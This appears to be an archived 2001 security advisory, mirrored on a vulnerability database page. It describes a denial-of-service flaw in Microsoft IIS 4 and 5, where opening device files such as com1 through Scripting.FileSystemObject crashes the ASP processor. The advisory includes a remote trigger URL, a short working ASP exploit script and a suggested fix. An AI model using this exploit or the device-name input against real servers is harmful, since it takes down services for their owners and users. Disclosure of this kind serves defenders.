Lucene search

nerf.iis.dos.txt

🗓️ 12 Jul 2001 00:00:00Reported by BuggzyType

packetstorm🔗 packetstormsecurity.com👁 31 Views

MS IIS local and remote DoS vulnerabilities due to Scripting.FileSystemObject misuse.

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

` --== NERF gr0up security advisory #4 ==--   
MS IIS local and remote DoS   
  
1. Vulnerable soft: IIS 4,5   
  
2. Description:  
Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor (asp.dll).  
  
3. Local exploit:  
If you have permission on creating .asp-file, you can crash ASP-processor.  
  
4. Remote exploit:  
Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file will  
crash asp-processor.  
http://host.int/scripts/script.asp?script=com1  
  
5. Solution:  
Fix Scripting.FileSystemObject (have to check file for existing before openning.  
  
6. ASP-Exploit:  
  
<%  
Dim strFileName, objFSO, objFile  
  
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")  
  
strFileName = "com1"  
  
Set objFile = objFSO.OpenTextFile(strFileName)  
  
Response.Write objFile.ReadAll  
  
objFile.Close  
  
%>  
  
7.Sorry:  
for poor english  
---------------------------------------------------  
Found by buggzy ([email protected])  
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

12 Jul 2001 00:00Current

7.4High risk

Vulners AI Score7.4